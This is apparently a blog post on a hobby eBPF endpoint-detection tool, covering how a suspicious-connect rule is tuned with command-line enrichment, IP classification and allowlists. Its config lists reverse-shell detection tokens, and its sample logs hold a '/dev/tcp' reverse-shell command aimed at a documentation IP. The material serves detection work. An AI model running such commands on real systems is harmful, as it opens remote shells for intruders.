Building a Mini EDR with eBPF 3: Reducing False Positives in SUSPICIOUS_CONNECT

In part 1, I collected execve, openat, and connect through tracepoints, then connected the eBPF ring buffer to a user-space rule engine and JSON Lines writer. In part 2, I correlated openat enter and exit events to distinguish /etc/shadow access attempts from successful opens.

This post moves to the network side. I do not add many new syscalls. The goal is to interpret the existing connect event more carefully.

The SUSPICIOUS_CONNECT rule in part 1 was intentionally simple. If a shell, script runtime, or network utility such as bash, python3, or nc connected to a public IPv4 address, the event was logged as suspicious. That was a good starting point for the MVP, but in real logs normal automation can look much like suspicious behavior.

For example, a python3 backup script may connect to an external storage API. A bash deployment script may connect to a package repository or health-check endpoint. An administrator may use nc for normal network testing.

So the core improvement is not to make detection broader. It is to reduce false positives by looking at the same connect event together with command line, destination IP classification, and allowlists.

A single connect event cannot prove an attack.
To improve detection quality, do not try to make every decision in the kernel.
Enrich context such as command line, destination, and allowlists in user space.

Problems in the Existing Rule

The original SUSPICIOUS_CONNECT condition was simple.

event_type == connect
comm in suspicious_process_names
dst_ip is external IPv4

This is quick to implement. The eBPF program reads sockaddr_in in sys_enter_connect, and the user-space rule engine only needs the process name and destination address.

But the limitations are clear.

  • comm is limited to 16 bytes including the terminating NUL, so longer names are truncated to 15 characters.
  • Process names can be changed.
  • Without command line, clues such as /dev/tcp/ are missed.
  • Excluding private IPs is not enough to express organization-specific normal destinations.
  • A public IP is not automatically malicious.

Rules based only on comm can catch many normal operation scripts. The name python3 alone does not tell whether it is a backup script, a one-liner, or suspicious reverse-shell preparation.
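The first two limitations are easy to reproduce. The following is a minimal sketch, assuming Linux with glibc; the helper name rename_and_read_comm is hypothetical and not part of the project. It renames the calling thread with prctl(PR_SET_NAME) and reads the name back, which shows both that comm can be changed at will and that it is cut at 15 characters.

```c
#include <string.h>
#include <sys/prctl.h>

/* Matches TASK_COMM_LEN in the kernel: 16 bytes including the NUL. */
#define COMM_LEN 16

/*
 * Hypothetical helper: rename the calling thread, then read the name
 * back. Returns 0 on success and -1 on failure.
 */
static int rename_and_read_comm(const char *new_name, char out[COMM_LEN])
{
    /* Names longer than 15 characters are silently truncated. */
    if (prctl(PR_SET_NAME, new_name, 0, 0, 0) != 0)
        return -1;

    memset(out, 0, COMM_LEN);
    if (prctl(PR_GET_NAME, out, 0, 0, 0) != 0)
        return -1;

    return 0;
}
```

Any process can do this to itself without special privileges, so a rule keyed only on comm can be sidestepped with one call.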

This time, I keep the connect event itself, but enrich the context needed for user-space interpretation.

Command Line Enrichment

The current eBPF program collects only an argv0-level command line for execve, and a connect event carries no command line at all. Rather than trying to read a long argv inside the kernel, I decided to read /proc/<pid>/cmdline from user space on a best-effort basis.

The flow is this.

receive connect event
  -> read /proc/<pid>/cmdline
  -> convert NUL separators to spaces
  -> reflect the result in event.cmdline for the rule engine
  -> write cmdline field to JSONL

The implementation is handled in the ring buffer callback in src/main.c. Instead of writing the kernel event directly, I create a local copy and read /proc/<pid>/cmdline only when the event is EVENT_CONNECT.

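/* Best-effort: fill event->cmdline for connect events from /proc/<pid>/cmdline. */
static void enrich_cmdline_from_proc(struct event *event)
{
    char path[64];
    FILE *file;
    size_t nread;

    if (event->event_type != EVENT_CONNECT || !event->pid)
        return;

    snprintf(path, sizeof(path), "/proc/%u/cmdline", event->pid);
    file = fopen(path, "rb");
    if (!file)
        return; /* process already gone or not readable: keep the event as-is */

    /* Leave one byte free for the terminating NUL. */
    nread = fread(event->cmdline, 1, sizeof(event->cmdline) - 1, file);
    fclose(file);

    /* argv entries are NUL-separated; join them with spaces. */
    event->cmdline[nread] = '\0';
    for (size_t i = 0; i < nread; i++) {
        if (event->cmdline[i] == '\0')
            event->cmdline[i] = ' ';
    }

    /* Trim the trailing space left by the final argv terminator. */
    while (nread > 0 && event->cmdline[nread - 1] == ' ')
        event->cmdline[--nread] = '\0';
}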

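This enrichment is not perfect. If the process has already exited by the time the event is received, /proc/<pid>/cmdline cannot be read. The read can also fail because of permissions or namespace differences. Because the read happens when user space receives the event, not at connect time, a process that has since called exec (or a recycled PID) can yield a different command line than the one that made the connection. Command lines can also contain sensitive information such as tokens or paths, so they should be handled carefully.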

So in this project, command line enrichment is not required for detection. If it can be read, it provides more evidence. If it cannot be read, the program still makes a decision with the existing event. Enrichment failure is not detection failure. It is missing context.

Destination IP Classification

The MVP already excluded private IPs. But that decision was not visible in the log. This time, I classify the destination IPv4 address and record it as dst_ip_class in JSONL.

The basic classification is simple.

loopback: 127.0.0.0/8
private: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
public: IPv4 addresses outside those ranges
unknown: no destination address or not interpretable

A public IP connection is logged like this.

{"event_type":"connect","dst_ip":"203.0.113.10","dst_ip_class":"public"}

A private IP connection is logged like this.

{"event_type":"connect","dst_ip":"192.168.0.10","dst_ip_class":"private"}

The purpose of this field is not to prove whether something is malicious. It is to make it easier to see why a rule matched or why it was suppressed. A public IP is not automatically malicious, and a private IP is not automatically safe. But within this post, the focus is reducing false positives in an external-connection heuristic.
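The classification above can be sketched as a small C function. This is a minimal sketch, not the project's actual code: the names classify_ipv4 and dst_ip_class_name are hypothetical, and it assumes the event stores the address in network byte order, as copied from sockaddr_in.

```c
#include <arpa/inet.h>
#include <stdint.h>

enum dst_ip_class {
    DST_IP_UNKNOWN,
    DST_IP_LOOPBACK,
    DST_IP_PRIVATE,
    DST_IP_PUBLIC
};

/*
 * Classify an IPv4 address given in network byte order (assumption).
 * has_addr is 0 when the event carried no usable destination.
 */
static enum dst_ip_class classify_ipv4(uint32_t addr_be, int has_addr)
{
    uint32_t ip;

    if (!has_addr)
        return DST_IP_UNKNOWN;

    ip = ntohl(addr_be);
    if ((ip & 0xFF000000u) == 0x7F000000u) /* 127.0.0.0/8 */
        return DST_IP_LOOPBACK;
    if ((ip & 0xFF000000u) == 0x0A000000u) /* 10.0.0.0/8 */
        return DST_IP_PRIVATE;
    if ((ip & 0xFFF00000u) == 0xAC100000u) /* 172.16.0.0/12 */
        return DST_IP_PRIVATE;
    if ((ip & 0xFFFF0000u) == 0xC0A80000u) /* 192.168.0.0/16 */
        return DST_IP_PRIVATE;

    /* Everything else counts as public under the post's definition. */
    return DST_IP_PUBLIC;
}

/* String form written to the dst_ip_class field in JSONL. */
static const char *dst_ip_class_name(enum dst_ip_class c)
{
    switch (c) {
    case DST_IP_LOOPBACK: return "loopback";
    case DST_IP_PRIVATE:  return "private";
    case DST_IP_PUBLIC:   return "public";
    default:              return "unknown";
    }
}
```

With only these four classes, ranges such as link-local 169.254.0.0/16 or multicast also land in public. That follows the definition in this post, and it is one more reason to read the field as context, not as a verdict.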

Allowlist and Suppression

To reduce false positives, normal destinations and normal command lines should be expressible in config. So I added three settings to suspicious_connect in config/rules.json.

"suspicious_connect": {
  "enabled": true,
  "severity": "high",
  "process_names": ["sh", "bash", "dash", "zsh", "python", "python3", "perl", "ruby", "nc", "ncat", "socat"],
  "cmdline_tokens": ["/dev/tcp/", "bash -i", "sh -i", "python -c", "python3 -c", "perl -e", "socat ", "ncat "],
  "exclude_private_ip": true,
  "allow_dst_ips": ["1.1.1.1"],
  "allow_cmdline_prefixes": ["python3 /opt/backup/"],
  "suppression_mode": "mark"
}

allow_dst_ips defines normal destination IPs. In the example, I put 1.1.1.1 in the allowlist. allow_cmdline_prefixes defines normal command line prefixes. For example, a backup script starting with python3 /opt/backup/ is not immediately treated as a high-severity detection even if it connects to a public IP.

suppression_mode decides how to handle events matched by the allowlist.

mark: store the event with suppressed=true
drop: do not store the event

For a portfolio project, mark is better. It shows the reasoning process behind the detection tool. In production, drop may be chosen to reduce log volume, but here it is more useful for learning and explanation to leave the false-positive reduction process in the logs.

A suppressed event looks like this.

{"event_type":"connect","comm":"python3","cmdline":"python3 /opt/backup/upload.py","dst_ip":"8.8.8.8","dst_ip_class":"public","rule":null,"severity":null,"suppressed":true,"suppress_reason":"allow_cmdline_prefix"}

Private IP exclusion is also expressed in the same suppression format.

{"event_type":"connect","comm":"bash","dst_ip":"192.168.0.10","dst_ip_class":"private","rule":null,"severity":null,"suppressed":true,"suppress_reason":"private_ip"}

This makes the reason for a non-match visible directly in the log.
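The suppression decision can be sketched as a function that returns the suppress_reason string, or NULL when nothing applies. This is a sketch under assumptions: the struct connect_allowlist layout and the function name are hypothetical, and the order of the checks (private IP first, then destination, then command line prefix) is my assumption, not something the config format dictates.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical in-memory form of the allowlist settings in rules.json. */
struct connect_allowlist {
    const char *const *dst_ips;
    size_t n_dst_ips;
    const char *const *cmdline_prefixes;
    size_t n_cmdline_prefixes;
    int exclude_private_ip;
};

/*
 * Return the suppress_reason for a connect event, or NULL when no
 * suppression applies. The check order is an assumption.
 */
static const char *connect_suppress_reason(const struct connect_allowlist *al,
                                           const char *dst_ip,
                                           const char *dst_ip_class,
                                           const char *cmdline)
{
    size_t i;

    if (al->exclude_private_ip && strcmp(dst_ip_class, "private") == 0)
        return "private_ip";

    for (i = 0; i < al->n_dst_ips; i++) {
        if (strcmp(dst_ip, al->dst_ips[i]) == 0)
            return "allow_dst_ip";
    }

    for (i = 0; i < al->n_cmdline_prefixes; i++) {
        size_t len = strlen(al->cmdline_prefixes[i]);

        /* Skip empty prefixes: they would match every command line. */
        if (len > 0 && strncmp(cmdline, al->cmdline_prefixes[i], len) == 0)
            return "allow_cmdline_prefix";
    }

    return NULL;
}
```

In mark mode the caller would write suppressed=true together with the returned reason, and in drop mode it would skip the write. One caveat of plain prefix matching: a command line such as python3 /opt/backup/../../tmp/x.py also starts with the allowed prefix, so prefixes should be kept as specific as possible.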

Improved SUSPICIOUS_CONNECT

Before the change, the rule only checked process name and whether the destination was public.

comm in suspicious_process_names
dst_ip_class == public

After the change, it checks allowlists and command line tokens together.

event_type == connect
address_family == AF_INET
dst_ip_class == public
not allow_dst_ip
not allow_cmdline_prefix
(
  comm in suspicious_process_names
  OR cmdline contains suspicious token
)

The command line token candidates are these.

  • /dev/tcp/
  • bash -i
  • sh -i
  • python -c
  • python3 -c
  • perl -e
  • socat (with a trailing space, as in the config)
  • ncat (with a trailing space, as in the config)

For example, this event is still recorded as SUSPICIOUS_CONNECT.

{"event_type":"connect","comm":"bash","cmdline":"bash -c exec 3<>/dev/tcp/203.0.113.10/4444","dst_ip":"203.0.113.10","dst_ip_class":"public","rule":"SUSPICIOUS_CONNECT","severity":"high","suppressed":false,"suppress_reason":null}

On the other hand, an event going to an allowlisted destination is not raised as a detection and is marked as suppressed.

{"event_type":"connect","comm":"bash","cmdline":"bash -c exec 3<>/dev/tcp/1.1.1.1/80","dst_ip":"1.1.1.1","dst_ip_class":"public","rule":null,"severity":null,"suppressed":true,"suppress_reason":"allow_dst_ip"}

A normal process connecting to a public IP is also logged without a rule match.

{"event_type":"connect","comm":"curl","cmdline":"curl https://example.com/health","dst_ip":"93.184.216.34","dst_ip_class":"public","rule":null,"severity":null,"suppressed":false,"suppress_reason":null}

This rule can still be bypassed. String-token-based detection is not perfect. Normal automation scripts may also contain similar strings. So this rule should be viewed as a way to prioritize investigation, not as a final attack verdict.
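The improved condition can be written as a single predicate. The following is a minimal sketch, assuming a simplified view of the event; struct connect_view and the function names are hypothetical, and suppress_reason is assumed to be computed beforehand (NULL when no allowlist matched). Process names are compared exactly, while tokens are matched as substrings of the command line.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical, simplified view of an enriched connect event. */
struct connect_view {
    int is_ipv4;                 /* address_family == AF_INET */
    const char *dst_ip_class;    /* "public", "private", ... */
    const char *suppress_reason; /* NULL when not allowlisted */
    const char *comm;
    const char *cmdline;
};

/* Exact match against a list of process names. */
static int str_in_list(const char *s, const char *const *list, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (strcmp(s, list[i]) == 0)
            return 1;
    }
    return 0;
}

/* Substring match: "sh -i" also matches inside "zsh -i". */
static int contains_any(const char *haystack, const char *const *tokens, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (strstr(haystack, tokens[i]) != NULL)
            return 1;
    }
    return 0;
}

/* Returns 1 when the event should be recorded as SUSPICIOUS_CONNECT. */
static int is_suspicious_connect(const struct connect_view *ev,
                                 const char *const *names, size_t n_names,
                                 const char *const *tokens, size_t n_tokens)
{
    if (!ev->is_ipv4 || strcmp(ev->dst_ip_class, "public") != 0)
        return 0;
    if (ev->suppress_reason != NULL)
        return 0;

    return str_in_list(ev->comm, names, n_names) ||
           contains_any(ev->cmdline, tokens, n_tokens);
}
```

The OR in the last step is what lets a renamed process still match through its command line, and it is also why an empty cmdline from a failed enrichment falls back to the process-name check alone.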

JSONL Output Changes

This change adds three fields to connect events and starts populating a fourth, cmdline.

dst_ip_class
suppressed
suppress_reason
cmdline

cmdline reuses the existing field. For connect events, user space fills it by reading /proc/<pid>/cmdline.

The final connect log contains the following information in one line.

{"timestamp":123,"event_type":"connect","pid":1000,"ppid":999,"uid":1000,"gid":1000,"comm":"bash","parent_comm":"bash","cmdline":"bash -c exec 3<>/dev/tcp/203.0.113.10/4444","path":"","flags":0,"dst_ip":"203.0.113.10","dst_port":4444,"address_family":2,"mnt_ns":4026531832,"pid_ns":4026531836,"dst_ip_class":"public","suppressed":false,"suppress_reason":null,"rule":"SUSPICIOUS_CONNECT","severity":"high"}

Now a log reader sees more than the fact that SUSPICIOUS_CONNECT fired. The destination classification and suppression state appear on the same line.
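One detail worth checking once cmdline comes from /proc: it can contain double quotes, backslashes, or control characters, and any of these would break a JSONL line if written raw. If the writer does not already escape strings, a helper along these lines could be used. This is a sketch with a hypothetical name, json_escape, and it assumes bytes at or above 0x80 are valid UTF-8 and passes them through unchanged.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: copy src into out as the body of a JSON string
 * (without the surrounding quotes). Output is truncated if out is too
 * small, but an escape sequence is never split. Returns the number of
 * bytes written, not counting the terminating NUL.
 */
static size_t json_escape(const char *src, char *out, size_t out_size)
{
    size_t used = 0;

    if (out_size == 0)
        return 0;

    for (; *src != '\0'; src++) {
        unsigned char c = (unsigned char)*src;
        char esc[8];
        int n;

        if (c == '"' || c == '\\')
            n = snprintf(esc, sizeof(esc), "\\%c", c);
        else if (c < 0x20)
            n = snprintf(esc, sizeof(esc), "\\u%04x", (unsigned int)c);
        else
            n = snprintf(esc, sizeof(esc), "%c", c);

        /* Stop before overflowing; keep room for the NUL. */
        if (used + (size_t)n >= out_size)
            break;
        memcpy(out + used, esc, (size_t)n);
        used += (size_t)n;
    }

    out[used] = '\0';
    return used;
}
```

Since enrichment has already replaced the NUL separators with spaces, the input here is an ordinary C string.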

Regression Tests Based on Sample Logs

Network event collection depends on the kernel, privileges, and external network state. The rule engine changes more frequently than that. If every rule change must be verified only by running the actual eBPF program, the feedback loop becomes slow.

So I added expected-result sample JSONL files under tests/samples/.

tests/samples/connect_public_suspicious.jsonl
tests/samples/connect_private_suppressed.jsonl
tests/samples/connect_allow_dst_ip.jsonl
tests/samples/connect_allow_cmdline_prefix.jsonl
tests/samples/connect_public_normal_process.jsonl

Then tests/test_connect_samples.sh checks whether each sample has the expected fields.

jq -e 'select(.rule == "SUSPICIOUS_CONNECT" and .suppressed == false and .dst_ip_class == "public")' \
  tests/samples/connect_public_suspicious.jsonl >/dev/null

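This test does not replace eBPF program testing. Kernel event collection tests and rule output shape tests are separate. But when changing rule policy, keeping expected output shapes as samples helps reduce regression risk. Note that jq -e with select succeeds as long as at least one line in the file matches, so this check is strictest when each sample file holds a single event.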

Why IPv6 Is Out of Scope Here

I did not implement IPv6 in this post. Parsing sockaddr_in6 and designing a shared output format for IPv4 and IPv6 are left as future work.

The reason is simple. The core of part 3 is not to expand address family coverage. It is to interpret the already-collected connect event more carefully. If IPv6 is added at the same time, the focus of the post could drift toward collection coverage.

For now, I first organized command line enrichment, IP classification, allowlists, and suppression for IPv4.

Part 3 Summary

The SUSPICIOUS_CONNECT rule from part 1 was a simple rule that logged a shell or script runtime connecting to a public IPv4 address as suspicious. Simple rules are quick to build, but in real logs, normal automation and suspicious behavior can look similar.

In this post, I interpreted connect events more carefully by enriching command line from /proc/<pid>/cmdline in user space. I classified destination IPv4 addresses with dst_ip_class, and added allow_dst_ips, allow_cmdline_prefixes, and suppression_mode to the config.

As a result, events matched by the allowlist can keep rule=null while recording suppressed=true and a suppress_reason. On the other hand, an event is recorded as SUSPICIOUS_CONNECT when it goes to a public IP, is not allowlisted, and has either a suspicious process name or a suspicious command line token.

The goal of part 3 is not to make detection broader. It is to interpret the same events more carefully and leave logs that are worth investigating.

GitHub Repository

The code for this post is available at ebpf-guard part-3.